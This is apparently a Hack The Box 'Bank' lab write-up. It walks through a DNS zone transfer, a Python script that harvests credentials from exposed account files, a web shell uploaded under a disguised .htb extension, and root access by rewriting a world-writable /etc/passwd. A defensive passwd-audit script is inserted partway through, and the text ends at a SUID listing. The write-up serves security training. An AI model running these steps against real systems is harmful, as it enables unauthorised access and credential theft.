HTB - Bank

Getting Root

Tools Used:

dig, dirsearch.py, python

Nmap

# Nmap 7.80 scan initiated Thu Mar 19 18:56:57 2020 as: nmap -sC -sV -p 22,53,80 -oA Bank 10.10.10.29   
Nmap scan report for 10.10.10.29
Host is up (0.040s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
|   2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
|   256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_  256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
53/tcp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar 19 18:57:12 2020 -- 1 IP address (1 host up) scanned in 15.09 seconds

Enumeration

DNS

Enumerating DNS reveals potential vhosts to use in our HTTP enumeration.

# Zone Transfer
dig axfr bank.htb @10.10.10.29
; <<>> DiG 9.11.16-2-Debian <<>> axfr bank.htb @10.10.10.29
;; global options: +cmd
bank.htb.               604800  IN      SOA     bank.htb. chris.bank.htb. 2 604800 86400 2419200 604800
bank.htb.               604800  IN      NS      ns.bank.htb.
bank.htb.               604800  IN      A       10.10.10.29
ns.bank.htb.            604800  IN      A       10.10.10.29
www.bank.htb.           604800  IN      CNAME   bank.htb.
bank.htb.               604800  IN      SOA     bank.htb. chris.bank.htb. 2 604800 86400 2419200 604800
;; Query time: 54 msec
;; SERVER: 10.10.10.29#53(10.10.10.29)
;; WHEN: Thu Mar 19 19:37:51 EDT 2020
;; XFR size: 6 records (messages 1, bytes 171)

HTTP

# python3 dirsearch.py -u http://bank.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php  

 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )

Extensions: php | HTTP method: get | Threads: 10 | Wordlist size: 220521

Error Log: /opt/dirsearch/logs/errors-20-03-19_20-31-36.log

Target: http://bank.htb

[20:31:36] Starting: 
[20:31:36] 302 -    7KB - /  ->  login.php
[20:31:37] 301 -  305B  - /uploads  ->  http://bank.htb/uploads/
[20:31:38] 301 -  304B  - /assets  ->  http://bank.htb/assets/
[20:31:50] 301 -  301B  - /inc  ->  http://bank.htb/inc/
[20:42:17] 403 -  288B  - /server-status
[20:53:57] 301 -  314B  - /balance-transfer  ->  http://bank.htb/balance-transfer/

Task Completed

Checking out /balance-transfer/

Opening any of the files shows an account's email and password in encrypted form. See example below:

Custom python script to get all the usernames and passwords

#!/usr/bin/env python3
# Created By: squid22
# HTB Bank

import re
import requests

url = "http://bank.htb/balance-transfer/"

# Fetch the directory listing and collect every .acc file name from it
r = requests.get(url)
data = r.text

acc_files = re.findall(r'href="(\w+\.acc)"', data)

for name in acc_files:
    r = requests.get(url + name)
    stuff = r.text
    user = re.search(r'Email: (.*)', stuff)
    passwd = re.search(r'Password: (.*)', stuff)
    # Skip any file that does not contain both fields instead of crashing
    if user is None or passwd is None:
        continue
    username = user.group(1).strip()
    password = passwd.group(1).strip()

    print(f"File Name: {name}")
    print(f"Username: {username}")
    print(f"Password: {password}")
    print("========================================")

Running the script shows one file whose contents were somehow not encrypted: File Name: 68576f20e9732f1b2edc4df5b8533230.acc

Let's login to http://bank.htb/login.php using the credentials found.

Success!

Getting shell

From the Support link, we can upload files, but it seems we can only upload images. Viewing the page source, an interesting debug message states that files with the *.htb extension are executed as *.php files.

# mv webshell.php webshell.htb

Privilege Escalation

Method 1 - /etc/passwd

During enumeration, /etc/passwd turned out to be world-writable:

www-data@bank:/var/www/bank/uploads$ stat /etc/passwd
  File: '/etc/passwd'
  Size: 1349            Blocks: 8          IO Block: 4096   regular file
Device: 801h/2049d      Inode: 661044      Links: 1
Access: (0666/-rw-rw-rw-)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2020-03-20 06:03:09.092145868 +0200
Modify: 2020-03-20 06:03:05.884145943 +0200
Change: 2020-03-20 06:03:05.884145943 +0200
 Birth: -

Generate a password hash for pass123 using openssl:

# openssl passwd --help
Usage: passwd [options] [passwords]
where options are
-crypt             standard Unix password algorithm (default)
-1                 MD5-based password algorithm
-apr1              MD5-based password algorithm, Apache variant
-salt string       use provided salt
-in file           read passwords from file
-stdin             read passwords from stdin
-noverify          never verify when reading password from terminal
-quiet             no warnings
-table             format output as table
-reverse           switch table columns
# openssl passwd -1 pass123
$1$rptdxUK7$QM4amjM8hyLaeSmEIr.U31

Edit /etc/passwd and replace root's password field with the generated hash.

# vim /etc/passwd
root:$1$rptdxUK7$QM4amjM8hyLaeSmEIr.U31:0:0:root:/root:/bin/bash

Log in as root

www-data@bank:/run/shm$ su root
Password: 
root@bank:/run/shm# 
root@bank:/run/shm# id
uid=0(root) gid=0(root) groups=0(root)
root@bank:/run/shm# 
root@bank:/run/shm# 
root@bank:/run/shm# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:50:56:b9:f4:a0  
          inet addr:10.10.10.29  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:feb9:f4a0/64 Scope:Link
          inet6 addr: dead:beef::250:56ff:feb9:f4a0/64 Scope:Global
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1532663 errors:33 dropped:156 overruns:0 frame:0
          TX packets:1522107 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:287906340 (287.9 MB)  TX bytes:713942880 (713.9 MB)
          Interrupt:19 Base address:0x2000 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:3393 errors:0 dropped:0 overruns:0 frame:0
          TX packets:3393 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:348982 (348.9 KB)  TX bytes:348982 (348.9 KB)
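Method 1 works only because /etc/passwd was writable and the shell accepted a hash placed directly in the password field. The following is an added defender-side audit, not part of the original writeup: it flags group/world write bits on the file's mode and any entry whose password field holds a hash instead of the shadow marker. The SAMPLE_PASSWD content is constructed from the edited root line above; audit_file is a hypothetical helper that runs both checks on a real host.

```python
#!/usr/bin/env python3
# Added defender-side check, not part of the original writeup: it looks for the two
# conditions Method 1 relies on, a group/world-writable passwd file and a password
# hash stored in /etc/passwd itself instead of in /etc/shadow.
import os
import stat

# Constructed sample: passwd content after the root line was edited as above.
SAMPLE_PASSWD = """root:$1$rptdxUK7$QM4amjM8hyLaeSmEIr.U31:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
"""
# Password-field values that mean "no hash here, look in /etc/shadow".
SHADOWED = {"x", "*", "!", "!!", ""}

def audit_passwd_content(text):
    """Return findings for passwd-format text: hashes present, malformed lines."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(f"line {lineno}: malformed entry ({len(fields)} fields)")
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if pw not in SHADOWED:
            tag = " (uid 0!)" if uid == "0" else ""
            findings.append(f"line {lineno}: {name} has a password hash in passwd{tag}")
    return findings

def mode_findings(mode):
    """Flag group/other write bits on an st_mode value such as 0o100666."""
    findings = []
    if mode & stat.S_IWGRP:
        findings.append("group-writable")
    if mode & stat.S_IWOTH:
        findings.append("world-writable")
    return findings

def audit_file(path="/etc/passwd"):
    """Run both checks against a real file on the host (hypothetical helper)."""
    st = os.stat(path)
    with open(path) as fh:
        return mode_findings(st.st_mode) + audit_passwd_content(fh.read())

if __name__ == "__main__":
    for f in mode_findings(0o100666) + audit_passwd_content(SAMPLE_PASSWD):
        print("FINDING:", f)
```

On a correctly configured host audit_file() returns an empty list; the 0666 mode from the stat output above and the edited root line each produce a finding.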

Method 2 - SUID executable

www-data@bank:/var/www/bank/uploads$ find / -perm -4000 -type f -ls 2>/dev/null
921605  112 -rwsr-xr-x   1 root     root       112204 Jun 14  2017 /var/htb/bin/emergency
397109    8 -rwsr-xr-x   1 root     root         5480 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
655904  484 -rwsr-xr-x   1 root     root       492972 Aug 11  2016 /usr/lib/openssh/ssh-keysign
395220  328 -rwsr-xr--   1 root     messagebus   333952 Dec  7  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper   
921007   12 -rwsr-xr-x   1 root     root         9808 Nov 24  2015 /usr/lib/policykit-1/polkit-agent-helper-1
403773   48 -rwsr-sr-x   1 daemon   daemon      46652 Oct 21  2013 /usr/bin/at
397102   36 -rwsr-xr-x   1 root     root        35916 May 17  2017 /usr/bin/chsh
397137   48 -rwsr-xr-x   1 root     root        45420 May 17  2017 /usr/bin/passwd
397136   44 -rwsr-xr-x   1 root     root        44620 May 17  2017 /usr/bin/chfn
404048   20 -rwsr-xr-x   1 root     root        18168 Nov 24  2015 /usr/bin/pkexec
397130   32 -rwsr-xr-x   1 root     root        30984 May 17  2017 /usr/bin/newgrp
403576   20 -rwsr-xr-x   1 root     root        18136 May  8  2014 /usr/bin/traceroute6.iputils
397103   68 -rwsr-xr-x   1 root     root        66284 May 17  2017 /usr/bin/gpasswd
393513  156 -rwsr-xr-x   1 root     root       156708 May 29  2017 /usr/bin/sudo
403601   72 -rwsr-xr-x   1 root     root        72860 Oct 21  2013 /usr/bin/mtr
397540   20 -rwsr-sr-x   1 libuuid  libuuid     17996 Nov 24  2016 /usr/sbin/uuidd
403655  316 -rwsr-xr--   1 root     dip        323000 Apr 21  2015 /usr/sbin/pppd
393288   40 -rwsr-xr-x   1 root     root        38932 May  8  2014 /bin/ping
393289   44 -rwsr-xr-x   1 root     root        43316 May  8  2014 /bin/ping6
397131   36 -rwsr-xr-x   1 root     root        35300 May 17  2017 /bin/su
403434   32 -rwsr-xr-x   1 root     root        30112 May 15  2015 /bin/fusermount
393504   88 -rwsr-xr-x   1 root     root        88752 Nov 24  2016 /bin/mount
396269   68 -rwsr-xr-x   1 root     root        67704 Nov 24  2016 /bin/umount
